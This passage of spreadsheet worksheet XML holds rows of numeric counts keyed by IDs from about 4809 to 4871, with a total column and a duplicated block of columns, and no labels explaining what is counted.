        <v>1</v>
      </c>
      <c r="D1137" s="8">
        <v>6</v>
      </c>
      <c r="E1137" s="8">
        <v>0</v>
      </c>
      <c r="F1137" s="8">
        <v>2</v>
      </c>
      <c r="G1137" s="8">
        <v>2</v>
      </c>
      <c r="H1137" s="8">
        <v>36</v>
      </c>
      <c r="K1137" s="7">
        <v>4809</v>
      </c>
      <c r="L1137" s="8">
        <v>25</v>
      </c>
      <c r="M1137" s="8">
        <v>1</v>
      </c>
      <c r="N1137" s="8">
        <v>6</v>
      </c>
      <c r="O1137" s="8">
        <v>0</v>
      </c>
      <c r="P1137" s="8">
        <v>2</v>
      </c>
      <c r="Q1137" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1138" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1138" s="7">
        <v>4810</v>
      </c>
      <c r="B1138" s="8">
        <v>24</v>
      </c>
      <c r="C1138" s="8">
        <v>0</v>
      </c>
      <c r="D1138" s="8">
        <v>0</v>
      </c>
      <c r="E1138" s="8">
        <v>0</v>
      </c>
      <c r="F1138" s="8">
        <v>17</v>
      </c>
      <c r="G1138" s="8">
        <v>6</v>
      </c>
      <c r="H1138" s="8">
        <v>47</v>
      </c>
      <c r="K1138" s="7">
        <v>4810</v>
      </c>
      <c r="L1138" s="8">
        <v>24</v>
      </c>
      <c r="M1138" s="8">
        <v>0</v>
      </c>
      <c r="N1138" s="8">
        <v>0</v>
      </c>
      <c r="O1138" s="8">
        <v>0</v>
      </c>
      <c r="P1138" s="8">
        <v>17</v>
      </c>
      <c r="Q1138" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1139" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1139" s="7">
        <v>4811</v>
      </c>
      <c r="B1139" s="8">
        <v>24</v>
      </c>
      <c r="C1139" s="8">
        <v>0</v>
      </c>
      <c r="D1139" s="8">
        <v>0</v>
      </c>
      <c r="E1139" s="8">
        <v>0</v>
      </c>
      <c r="F1139" s="8">
        <v>17</v>
      </c>
      <c r="G1139" s="8">
        <v>6</v>
      </c>
      <c r="H1139" s="8">
        <v>47</v>
      </c>
      <c r="K1139" s="7">
        <v>4811</v>
      </c>
      <c r="L1139" s="8">
        <v>24</v>
      </c>
      <c r="M1139" s="8">
        <v>0</v>
      </c>
      <c r="N1139" s="8">
        <v>0</v>
      </c>
      <c r="O1139" s="8">
        <v>0</v>
      </c>
      <c r="P1139" s="8">
        <v>17</v>
      </c>
      <c r="Q1139" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1140" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1140" s="7">
        <v>4813</v>
      </c>
      <c r="B1140" s="8">
        <v>0</v>
      </c>
      <c r="C1140" s="8">
        <v>0</v>
      </c>
      <c r="D1140" s="8">
        <v>7</v>
      </c>
      <c r="E1140" s="8">
        <v>8</v>
      </c>
      <c r="F1140" s="8">
        <v>3</v>
      </c>
      <c r="G1140" s="8">
        <v>2</v>
      </c>
      <c r="H1140" s="8">
        <v>20</v>
      </c>
      <c r="K1140" s="7">
        <v>4813</v>
      </c>
      <c r="L1140" s="8">
        <v>0</v>
      </c>
      <c r="M1140" s="8">
        <v>0</v>
      </c>
      <c r="N1140" s="8">
        <v>7</v>
      </c>
      <c r="O1140" s="8">
        <v>8</v>
      </c>
      <c r="P1140" s="8">
        <v>3</v>
      </c>
      <c r="Q1140" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1141" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1141" s="7">
        <v>4814</v>
      </c>
      <c r="B1141" s="8">
        <v>26</v>
      </c>
      <c r="C1141" s="8">
        <v>0</v>
      </c>
      <c r="D1141" s="8">
        <v>2</v>
      </c>
      <c r="E1141" s="8">
        <v>8</v>
      </c>
      <c r="F1141" s="8">
        <v>2</v>
      </c>
      <c r="G1141" s="8">
        <v>0</v>
      </c>
      <c r="H1141" s="8">
        <v>38</v>
      </c>
      <c r="K1141" s="7">
        <v>4814</v>
      </c>
      <c r="L1141" s="8">
        <v>26</v>
      </c>
      <c r="M1141" s="8">
        <v>0</v>
      </c>
      <c r="N1141" s="8">
        <v>2</v>
      </c>
      <c r="O1141" s="8">
        <v>8</v>
      </c>
      <c r="P1141" s="8">
        <v>2</v>
      </c>
      <c r="Q1141" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1142" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1142" s="7">
        <v>4816</v>
      </c>
      <c r="B1142" s="8">
        <v>12</v>
      </c>
      <c r="C1142" s="8">
        <v>0</v>
      </c>
      <c r="D1142" s="8">
        <v>8</v>
      </c>
      <c r="E1142" s="8">
        <v>2</v>
      </c>
      <c r="F1142" s="8">
        <v>5</v>
      </c>
      <c r="G1142" s="8">
        <v>4</v>
      </c>
      <c r="H1142" s="8">
        <v>31</v>
      </c>
      <c r="K1142" s="7">
        <v>4816</v>
      </c>
      <c r="L1142" s="8">
        <v>12</v>
      </c>
      <c r="M1142" s="8">
        <v>0</v>
      </c>
      <c r="N1142" s="8">
        <v>8</v>
      </c>
      <c r="O1142" s="8">
        <v>2</v>
      </c>
      <c r="P1142" s="8">
        <v>5</v>
      </c>
      <c r="Q1142" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1143" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1143" s="7">
        <v>4817</v>
      </c>
      <c r="B1143" s="8">
        <v>24</v>
      </c>
      <c r="C1143" s="8">
        <v>1</v>
      </c>
      <c r="D1143" s="8">
        <v>0</v>
      </c>
      <c r="E1143" s="8">
        <v>0</v>
      </c>
      <c r="F1143" s="8">
        <v>8</v>
      </c>
      <c r="G1143" s="8">
        <v>3</v>
      </c>
      <c r="H1143" s="8">
        <v>36</v>
      </c>
      <c r="K1143" s="7">
        <v>4817</v>
      </c>
      <c r="L1143" s="8">
        <v>24</v>
      </c>
      <c r="M1143" s="8">
        <v>1</v>
      </c>
      <c r="N1143" s="8">
        <v>0</v>
      </c>
      <c r="O1143" s="8">
        <v>0</v>
      </c>
      <c r="P1143" s="8">
        <v>8</v>
      </c>
      <c r="Q1143" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1144" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1144" s="7">
        <v>4819</v>
      </c>
      <c r="B1144" s="8">
        <v>26</v>
      </c>
      <c r="C1144" s="8">
        <v>4</v>
      </c>
      <c r="D1144" s="8">
        <v>3</v>
      </c>
      <c r="E1144" s="8">
        <v>0</v>
      </c>
      <c r="F1144" s="8">
        <v>14</v>
      </c>
      <c r="G1144" s="8">
        <v>1</v>
      </c>
      <c r="H1144" s="8">
        <v>48</v>
      </c>
      <c r="K1144" s="7">
        <v>4819</v>
      </c>
      <c r="L1144" s="8">
        <v>26</v>
      </c>
      <c r="M1144" s="8">
        <v>4</v>
      </c>
      <c r="N1144" s="8">
        <v>3</v>
      </c>
      <c r="O1144" s="8">
        <v>0</v>
      </c>
      <c r="P1144" s="8">
        <v>14</v>
      </c>
      <c r="Q1144" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1145" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1145" s="7">
        <v>4820</v>
      </c>
      <c r="B1145" s="8">
        <v>6</v>
      </c>
      <c r="C1145" s="8">
        <v>0</v>
      </c>
      <c r="D1145" s="8">
        <v>0</v>
      </c>
      <c r="E1145" s="8">
        <v>0</v>
      </c>
      <c r="F1145" s="8">
        <v>9</v>
      </c>
      <c r="G1145" s="8">
        <v>2</v>
      </c>
      <c r="H1145" s="8">
        <v>17</v>
      </c>
      <c r="K1145" s="7">
        <v>4820</v>
      </c>
      <c r="L1145" s="8">
        <v>6</v>
      </c>
      <c r="M1145" s="8">
        <v>0</v>
      </c>
      <c r="N1145" s="8">
        <v>0</v>
      </c>
      <c r="O1145" s="8">
        <v>0</v>
      </c>
      <c r="P1145" s="8">
        <v>9</v>
      </c>
      <c r="Q1145" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1146" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1146" s="7">
        <v>4821</v>
      </c>
      <c r="B1146" s="8">
        <v>26</v>
      </c>
      <c r="C1146" s="8">
        <v>2</v>
      </c>
      <c r="D1146" s="8">
        <v>0</v>
      </c>
      <c r="E1146" s="8">
        <v>0</v>
      </c>
      <c r="F1146" s="8">
        <v>24</v>
      </c>
      <c r="G1146" s="8">
        <v>5</v>
      </c>
      <c r="H1146" s="8">
        <v>57</v>
      </c>
      <c r="K1146" s="7">
        <v>4821</v>
      </c>
      <c r="L1146" s="8">
        <v>26</v>
      </c>
      <c r="M1146" s="8">
        <v>2</v>
      </c>
      <c r="N1146" s="8">
        <v>0</v>
      </c>
      <c r="O1146" s="8">
        <v>0</v>
      </c>
      <c r="P1146" s="8">
        <v>24</v>
      </c>
      <c r="Q1146" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1147" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1147" s="7">
        <v>4824</v>
      </c>
      <c r="B1147" s="8">
        <v>0</v>
      </c>
      <c r="C1147" s="8">
        <v>0</v>
      </c>
      <c r="D1147" s="8">
        <v>3</v>
      </c>
      <c r="E1147" s="8">
        <v>0</v>
      </c>
      <c r="F1147" s="8">
        <v>7</v>
      </c>
      <c r="G1147" s="8">
        <v>6</v>
      </c>
      <c r="H1147" s="8">
        <v>16</v>
      </c>
      <c r="K1147" s="7">
        <v>4824</v>
      </c>
      <c r="L1147" s="8">
        <v>0</v>
      </c>
      <c r="M1147" s="8">
        <v>0</v>
      </c>
      <c r="N1147" s="8">
        <v>3</v>
      </c>
      <c r="O1147" s="8">
        <v>0</v>
      </c>
      <c r="P1147" s="8">
        <v>7</v>
      </c>
      <c r="Q1147" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1148" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1148" s="7">
        <v>4826</v>
      </c>
      <c r="B1148" s="8">
        <v>0</v>
      </c>
      <c r="C1148" s="8">
        <v>0</v>
      </c>
      <c r="D1148" s="8">
        <v>0</v>
      </c>
      <c r="E1148" s="8">
        <v>0</v>
      </c>
      <c r="F1148" s="8">
        <v>3</v>
      </c>
      <c r="G1148" s="8">
        <v>9</v>
      </c>
      <c r="H1148" s="8">
        <v>12</v>
      </c>
      <c r="K1148" s="7">
        <v>4826</v>
      </c>
      <c r="L1148" s="8">
        <v>0</v>
      </c>
      <c r="M1148" s="8">
        <v>0</v>
      </c>
      <c r="N1148" s="8">
        <v>0</v>
      </c>
      <c r="O1148" s="8">
        <v>0</v>
      </c>
      <c r="P1148" s="8">
        <v>3</v>
      </c>
      <c r="Q1148" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="1149" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1149" s="7">
        <v>4827</v>
      </c>
      <c r="B1149" s="8">
        <v>26</v>
      </c>
      <c r="C1149" s="8">
        <v>1</v>
      </c>
      <c r="D1149" s="8">
        <v>0</v>
      </c>
      <c r="E1149" s="8">
        <v>0</v>
      </c>
      <c r="F1149" s="8">
        <v>1</v>
      </c>
      <c r="G1149" s="8">
        <v>3</v>
      </c>
      <c r="H1149" s="8">
        <v>31</v>
      </c>
      <c r="K1149" s="7">
        <v>4827</v>
      </c>
      <c r="L1149" s="8">
        <v>26</v>
      </c>
      <c r="M1149" s="8">
        <v>1</v>
      </c>
      <c r="N1149" s="8">
        <v>0</v>
      </c>
      <c r="O1149" s="8">
        <v>0</v>
      </c>
      <c r="P1149" s="8">
        <v>1</v>
      </c>
      <c r="Q1149" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1150" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1150" s="7">
        <v>4828</v>
      </c>
      <c r="B1150" s="8">
        <v>24</v>
      </c>
      <c r="C1150" s="8">
        <v>1</v>
      </c>
      <c r="D1150" s="8">
        <v>9</v>
      </c>
      <c r="E1150" s="8">
        <v>0</v>
      </c>
      <c r="F1150" s="8">
        <v>0</v>
      </c>
      <c r="G1150" s="8">
        <v>1</v>
      </c>
      <c r="H1150" s="8">
        <v>35</v>
      </c>
      <c r="K1150" s="7">
        <v>4828</v>
      </c>
      <c r="L1150" s="8">
        <v>24</v>
      </c>
      <c r="M1150" s="8">
        <v>1</v>
      </c>
      <c r="N1150" s="8">
        <v>9</v>
      </c>
      <c r="O1150" s="8">
        <v>0</v>
      </c>
      <c r="P1150" s="8">
        <v>0</v>
      </c>
      <c r="Q1150" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1151" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1151" s="7">
        <v>4830</v>
      </c>
      <c r="B1151" s="8">
        <v>0</v>
      </c>
      <c r="C1151" s="8">
        <v>0</v>
      </c>
      <c r="D1151" s="8">
        <v>0</v>
      </c>
      <c r="E1151" s="8">
        <v>0</v>
      </c>
      <c r="F1151" s="8">
        <v>28</v>
      </c>
      <c r="G1151" s="8">
        <v>19</v>
      </c>
      <c r="H1151" s="8">
        <v>47</v>
      </c>
      <c r="K1151" s="7">
        <v>4830</v>
      </c>
      <c r="L1151" s="8">
        <v>0</v>
      </c>
      <c r="M1151" s="8">
        <v>0</v>
      </c>
      <c r="N1151" s="8">
        <v>0</v>
      </c>
      <c r="O1151" s="8">
        <v>0</v>
      </c>
      <c r="P1151" s="8">
        <v>28</v>
      </c>
      <c r="Q1151" s="8">
        <v>19</v>
      </c>
    </row>
    <row r="1152" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1152" s="7">
        <v>4831</v>
      </c>
      <c r="B1152" s="8">
        <v>25</v>
      </c>
      <c r="C1152" s="8">
        <v>1</v>
      </c>
      <c r="D1152" s="8">
        <v>6</v>
      </c>
      <c r="E1152" s="8">
        <v>6</v>
      </c>
      <c r="F1152" s="8">
        <v>3</v>
      </c>
      <c r="G1152" s="8">
        <v>2</v>
      </c>
      <c r="H1152" s="8">
        <v>43</v>
      </c>
      <c r="K1152" s="7">
        <v>4831</v>
      </c>
      <c r="L1152" s="8">
        <v>25</v>
      </c>
      <c r="M1152" s="8">
        <v>1</v>
      </c>
      <c r="N1152" s="8">
        <v>6</v>
      </c>
      <c r="O1152" s="8">
        <v>6</v>
      </c>
      <c r="P1152" s="8">
        <v>3</v>
      </c>
      <c r="Q1152" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1153" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1153" s="7">
        <v>4832</v>
      </c>
      <c r="B1153" s="8">
        <v>24</v>
      </c>
      <c r="C1153" s="8">
        <v>1</v>
      </c>
      <c r="D1153" s="8">
        <v>100</v>
      </c>
      <c r="E1153" s="8">
        <v>288</v>
      </c>
      <c r="F1153" s="8">
        <v>55</v>
      </c>
      <c r="G1153" s="8">
        <v>69</v>
      </c>
      <c r="H1153" s="8">
        <v>537</v>
      </c>
      <c r="K1153" s="7">
        <v>4832</v>
      </c>
      <c r="L1153" s="8">
        <v>24</v>
      </c>
      <c r="M1153" s="8">
        <v>1</v>
      </c>
      <c r="N1153" s="8">
        <v>100</v>
      </c>
      <c r="O1153" s="8">
        <v>288</v>
      </c>
      <c r="P1153" s="8">
        <v>55</v>
      </c>
      <c r="Q1153" s="8">
        <v>69</v>
      </c>
    </row>
    <row r="1154" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1154" s="7">
        <v>4834</v>
      </c>
      <c r="B1154" s="8">
        <v>26</v>
      </c>
      <c r="C1154" s="8">
        <v>1</v>
      </c>
      <c r="D1154" s="8">
        <v>10</v>
      </c>
      <c r="E1154" s="8">
        <v>0</v>
      </c>
      <c r="F1154" s="8">
        <v>22</v>
      </c>
      <c r="G1154" s="8">
        <v>4</v>
      </c>
      <c r="H1154" s="8">
        <v>63</v>
      </c>
      <c r="K1154" s="7">
        <v>4834</v>
      </c>
      <c r="L1154" s="8">
        <v>26</v>
      </c>
      <c r="M1154" s="8">
        <v>1</v>
      </c>
      <c r="N1154" s="8">
        <v>10</v>
      </c>
      <c r="O1154" s="8">
        <v>0</v>
      </c>
      <c r="P1154" s="8">
        <v>22</v>
      </c>
      <c r="Q1154" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1155" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1155" s="7">
        <v>4836</v>
      </c>
      <c r="B1155" s="8">
        <v>26</v>
      </c>
      <c r="C1155" s="8">
        <v>0</v>
      </c>
      <c r="D1155" s="8">
        <v>5</v>
      </c>
      <c r="E1155" s="8">
        <v>4</v>
      </c>
      <c r="F1155" s="8">
        <v>1</v>
      </c>
      <c r="G1155" s="8">
        <v>1</v>
      </c>
      <c r="H1155" s="8">
        <v>37</v>
      </c>
      <c r="K1155" s="7">
        <v>4836</v>
      </c>
      <c r="L1155" s="8">
        <v>26</v>
      </c>
      <c r="M1155" s="8">
        <v>0</v>
      </c>
      <c r="N1155" s="8">
        <v>5</v>
      </c>
      <c r="O1155" s="8">
        <v>4</v>
      </c>
      <c r="P1155" s="8">
        <v>1</v>
      </c>
      <c r="Q1155" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1156" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1156" s="7">
        <v>4837</v>
      </c>
      <c r="B1156" s="8">
        <v>26</v>
      </c>
      <c r="C1156" s="8">
        <v>1</v>
      </c>
      <c r="D1156" s="8">
        <v>20</v>
      </c>
      <c r="E1156" s="8">
        <v>26</v>
      </c>
      <c r="F1156" s="8">
        <v>2</v>
      </c>
      <c r="G1156" s="8">
        <v>3</v>
      </c>
      <c r="H1156" s="8">
        <v>78</v>
      </c>
      <c r="K1156" s="7">
        <v>4837</v>
      </c>
      <c r="L1156" s="8">
        <v>26</v>
      </c>
      <c r="M1156" s="8">
        <v>1</v>
      </c>
      <c r="N1156" s="8">
        <v>20</v>
      </c>
      <c r="O1156" s="8">
        <v>26</v>
      </c>
      <c r="P1156" s="8">
        <v>2</v>
      </c>
      <c r="Q1156" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1157" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1157" s="7">
        <v>4838</v>
      </c>
      <c r="B1157" s="8">
        <v>25</v>
      </c>
      <c r="C1157" s="8">
        <v>2</v>
      </c>
      <c r="D1157" s="8">
        <v>5</v>
      </c>
      <c r="E1157" s="8">
        <v>0</v>
      </c>
      <c r="F1157" s="8">
        <v>6</v>
      </c>
      <c r="G1157" s="8">
        <v>0</v>
      </c>
      <c r="H1157" s="8">
        <v>38</v>
      </c>
      <c r="K1157" s="7">
        <v>4838</v>
      </c>
      <c r="L1157" s="8">
        <v>25</v>
      </c>
      <c r="M1157" s="8">
        <v>2</v>
      </c>
      <c r="N1157" s="8">
        <v>5</v>
      </c>
      <c r="O1157" s="8">
        <v>0</v>
      </c>
      <c r="P1157" s="8">
        <v>6</v>
      </c>
      <c r="Q1157" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1158" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1158" s="7">
        <v>4839</v>
      </c>
      <c r="B1158" s="8">
        <v>0</v>
      </c>
      <c r="C1158" s="8">
        <v>0</v>
      </c>
      <c r="D1158" s="8">
        <v>0</v>
      </c>
      <c r="E1158" s="8">
        <v>0</v>
      </c>
      <c r="F1158" s="8">
        <v>57</v>
      </c>
      <c r="G1158" s="8">
        <v>42</v>
      </c>
      <c r="H1158" s="8">
        <v>99</v>
      </c>
      <c r="K1158" s="7">
        <v>4839</v>
      </c>
      <c r="L1158" s="8">
        <v>0</v>
      </c>
      <c r="M1158" s="8">
        <v>0</v>
      </c>
      <c r="N1158" s="8">
        <v>0</v>
      </c>
      <c r="O1158" s="8">
        <v>0</v>
      </c>
      <c r="P1158" s="8">
        <v>57</v>
      </c>
      <c r="Q1158" s="8">
        <v>42</v>
      </c>
    </row>
    <row r="1159" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1159" s="7">
        <v>4840</v>
      </c>
      <c r="B1159" s="8">
        <v>24</v>
      </c>
      <c r="C1159" s="8">
        <v>1</v>
      </c>
      <c r="D1159" s="8">
        <v>2</v>
      </c>
      <c r="E1159" s="8">
        <v>8</v>
      </c>
      <c r="F1159" s="8">
        <v>3</v>
      </c>
      <c r="G1159" s="8">
        <v>24</v>
      </c>
      <c r="H1159" s="8">
        <v>62</v>
      </c>
      <c r="K1159" s="7">
        <v>4840</v>
      </c>
      <c r="L1159" s="8">
        <v>24</v>
      </c>
      <c r="M1159" s="8">
        <v>1</v>
      </c>
      <c r="N1159" s="8">
        <v>2</v>
      </c>
      <c r="O1159" s="8">
        <v>8</v>
      </c>
      <c r="P1159" s="8">
        <v>3</v>
      </c>
      <c r="Q1159" s="8">
        <v>24</v>
      </c>
    </row>
    <row r="1160" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1160" s="7">
        <v>4841</v>
      </c>
      <c r="B1160" s="8">
        <v>26</v>
      </c>
      <c r="C1160" s="8">
        <v>1</v>
      </c>
      <c r="D1160" s="8">
        <v>30</v>
      </c>
      <c r="E1160" s="8">
        <v>5</v>
      </c>
      <c r="F1160" s="8">
        <v>2</v>
      </c>
      <c r="G1160" s="8">
        <v>4</v>
      </c>
      <c r="H1160" s="8">
        <v>68</v>
      </c>
      <c r="K1160" s="7">
        <v>4841</v>
      </c>
      <c r="L1160" s="8">
        <v>26</v>
      </c>
      <c r="M1160" s="8">
        <v>1</v>
      </c>
      <c r="N1160" s="8">
        <v>30</v>
      </c>
      <c r="O1160" s="8">
        <v>5</v>
      </c>
      <c r="P1160" s="8">
        <v>2</v>
      </c>
      <c r="Q1160" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1161" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1161" s="7">
        <v>4846</v>
      </c>
      <c r="B1161" s="8">
        <v>25</v>
      </c>
      <c r="C1161" s="8">
        <v>3</v>
      </c>
      <c r="D1161" s="8">
        <v>243</v>
      </c>
      <c r="E1161" s="8">
        <v>16</v>
      </c>
      <c r="F1161" s="8">
        <v>45</v>
      </c>
      <c r="G1161" s="8">
        <v>3</v>
      </c>
      <c r="H1161" s="8">
        <v>335</v>
      </c>
      <c r="K1161" s="7">
        <v>4846</v>
      </c>
      <c r="L1161" s="8">
        <v>25</v>
      </c>
      <c r="M1161" s="8">
        <v>3</v>
      </c>
      <c r="N1161" s="8">
        <v>243</v>
      </c>
      <c r="O1161" s="8">
        <v>16</v>
      </c>
      <c r="P1161" s="8">
        <v>45</v>
      </c>
      <c r="Q1161" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1162" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1162" s="7">
        <v>4847</v>
      </c>
      <c r="B1162" s="8">
        <v>6</v>
      </c>
      <c r="C1162" s="8">
        <v>0</v>
      </c>
      <c r="D1162" s="8">
        <v>0</v>
      </c>
      <c r="E1162" s="8">
        <v>0</v>
      </c>
      <c r="F1162" s="8">
        <v>30</v>
      </c>
      <c r="G1162" s="8">
        <v>0</v>
      </c>
      <c r="H1162" s="8">
        <v>36</v>
      </c>
      <c r="K1162" s="7">
        <v>4847</v>
      </c>
      <c r="L1162" s="8">
        <v>6</v>
      </c>
      <c r="M1162" s="8">
        <v>0</v>
      </c>
      <c r="N1162" s="8">
        <v>0</v>
      </c>
      <c r="O1162" s="8">
        <v>0</v>
      </c>
      <c r="P1162" s="8">
        <v>30</v>
      </c>
      <c r="Q1162" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1163" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1163" s="7">
        <v>4853</v>
      </c>
      <c r="B1163" s="8">
        <v>24</v>
      </c>
      <c r="C1163" s="8">
        <v>0</v>
      </c>
      <c r="D1163" s="8">
        <v>0</v>
      </c>
      <c r="E1163" s="8">
        <v>0</v>
      </c>
      <c r="F1163" s="8">
        <v>17</v>
      </c>
      <c r="G1163" s="8">
        <v>6</v>
      </c>
      <c r="H1163" s="8">
        <v>47</v>
      </c>
      <c r="K1163" s="7">
        <v>4853</v>
      </c>
      <c r="L1163" s="8">
        <v>24</v>
      </c>
      <c r="M1163" s="8">
        <v>0</v>
      </c>
      <c r="N1163" s="8">
        <v>0</v>
      </c>
      <c r="O1163" s="8">
        <v>0</v>
      </c>
      <c r="P1163" s="8">
        <v>17</v>
      </c>
      <c r="Q1163" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1164" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1164" s="7">
        <v>4858</v>
      </c>
      <c r="B1164" s="8">
        <v>0</v>
      </c>
      <c r="C1164" s="8">
        <v>0</v>
      </c>
      <c r="D1164" s="8">
        <v>0</v>
      </c>
      <c r="E1164" s="8">
        <v>0</v>
      </c>
      <c r="F1164" s="8">
        <v>7</v>
      </c>
      <c r="G1164" s="8">
        <v>3</v>
      </c>
      <c r="H1164" s="8">
        <v>10</v>
      </c>
      <c r="K1164" s="7">
        <v>4858</v>
      </c>
      <c r="L1164" s="8">
        <v>0</v>
      </c>
      <c r="M1164" s="8">
        <v>0</v>
      </c>
      <c r="N1164" s="8">
        <v>0</v>
      </c>
      <c r="O1164" s="8">
        <v>0</v>
      </c>
      <c r="P1164" s="8">
        <v>7</v>
      </c>
      <c r="Q1164" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1165" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1165" s="7">
        <v>4860</v>
      </c>
      <c r="B1165" s="8">
        <v>30</v>
      </c>
      <c r="C1165" s="8">
        <v>0</v>
      </c>
      <c r="D1165" s="8">
        <v>0</v>
      </c>
      <c r="E1165" s="8">
        <v>0</v>
      </c>
      <c r="F1165" s="8">
        <v>4</v>
      </c>
      <c r="G1165" s="8">
        <v>1</v>
      </c>
      <c r="H1165" s="8">
        <v>35</v>
      </c>
      <c r="K1165" s="7">
        <v>4860</v>
      </c>
      <c r="L1165" s="8">
        <v>30</v>
      </c>
      <c r="M1165" s="8">
        <v>0</v>
      </c>
      <c r="N1165" s="8">
        <v>0</v>
      </c>
      <c r="O1165" s="8">
        <v>0</v>
      </c>
      <c r="P1165" s="8">
        <v>4</v>
      </c>
      <c r="Q1165" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1166" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1166" s="7">
        <v>4862</v>
      </c>
      <c r="B1166" s="8">
        <v>36</v>
      </c>
      <c r="C1166" s="8">
        <v>2</v>
      </c>
      <c r="D1166" s="8">
        <v>4</v>
      </c>
      <c r="E1166" s="8">
        <v>2</v>
      </c>
      <c r="F1166" s="8">
        <v>11</v>
      </c>
      <c r="G1166" s="8">
        <v>2</v>
      </c>
      <c r="H1166" s="8">
        <v>57</v>
      </c>
      <c r="K1166" s="7">
        <v>4862</v>
      </c>
      <c r="L1166" s="8">
        <v>36</v>
      </c>
      <c r="M1166" s="8">
        <v>2</v>
      </c>
      <c r="N1166" s="8">
        <v>4</v>
      </c>
      <c r="O1166" s="8">
        <v>2</v>
      </c>
      <c r="P1166" s="8">
        <v>11</v>
      </c>
      <c r="Q1166" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1167" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1167" s="7">
        <v>4863</v>
      </c>
      <c r="B1167" s="8">
        <v>30</v>
      </c>
      <c r="C1167" s="8">
        <v>1</v>
      </c>
      <c r="D1167" s="8">
        <v>0</v>
      </c>
      <c r="E1167" s="8">
        <v>30</v>
      </c>
      <c r="F1167" s="8">
        <v>3</v>
      </c>
      <c r="G1167" s="8">
        <v>0</v>
      </c>
      <c r="H1167" s="8">
        <v>64</v>
      </c>
      <c r="K1167" s="7">
        <v>4863</v>
      </c>
      <c r="L1167" s="8">
        <v>30</v>
      </c>
      <c r="M1167" s="8">
        <v>1</v>
      </c>
      <c r="N1167" s="8">
        <v>0</v>
      </c>
      <c r="O1167" s="8">
        <v>30</v>
      </c>
      <c r="P1167" s="8">
        <v>3</v>
      </c>
      <c r="Q1167" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1168" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1168" s="7">
        <v>4866</v>
      </c>
      <c r="B1168" s="8">
        <v>30</v>
      </c>
      <c r="C1168" s="8">
        <v>1</v>
      </c>
      <c r="D1168" s="8">
        <v>5</v>
      </c>
      <c r="E1168" s="8">
        <v>0</v>
      </c>
      <c r="F1168" s="8">
        <v>0</v>
      </c>
      <c r="G1168" s="8">
        <v>10</v>
      </c>
      <c r="H1168" s="8">
        <v>46</v>
      </c>
      <c r="K1168" s="7">
        <v>4866</v>
      </c>
      <c r="L1168" s="8">
        <v>30</v>
      </c>
      <c r="M1168" s="8">
        <v>1</v>
      </c>
      <c r="N1168" s="8">
        <v>5</v>
      </c>
      <c r="O1168" s="8">
        <v>0</v>
      </c>
      <c r="P1168" s="8">
        <v>0</v>
      </c>
      <c r="Q1168" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1169" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1169" s="7">
        <v>4871</v>
      </c>
      <c r="B1169" s="8">
        <v>26</v>
      </c>
      <c r="C1169" s="8">
        <v>1</v>
      </c>
      <c r="D1169" s="8">
        <v>0</v>
      </c>
      <c r="E1169" s="8">
        <v>0</v>
      </c>
      <c r="F1169" s="8">
        <v>4</v>
      </c>
      <c r="G1169" s="8">
        <v>2</v>
      </c>
      <c r="H1169" s="8">
        <v>33</v>
      </c>
      <c r="K1169" s="7">
        <v>4871</v>
      </c>
      <c r="L1169" s="8">
        <v>26</v>
      </c>
      <c r="M1169" s="8">
        <v>1</v>
      </c>
      <c r="N1169" s="8">
        <v>0</v>
      </c>
      <c r="O1169" s="8">
        <v>0</v>
      </c>
      <c r="P1169" s="8">
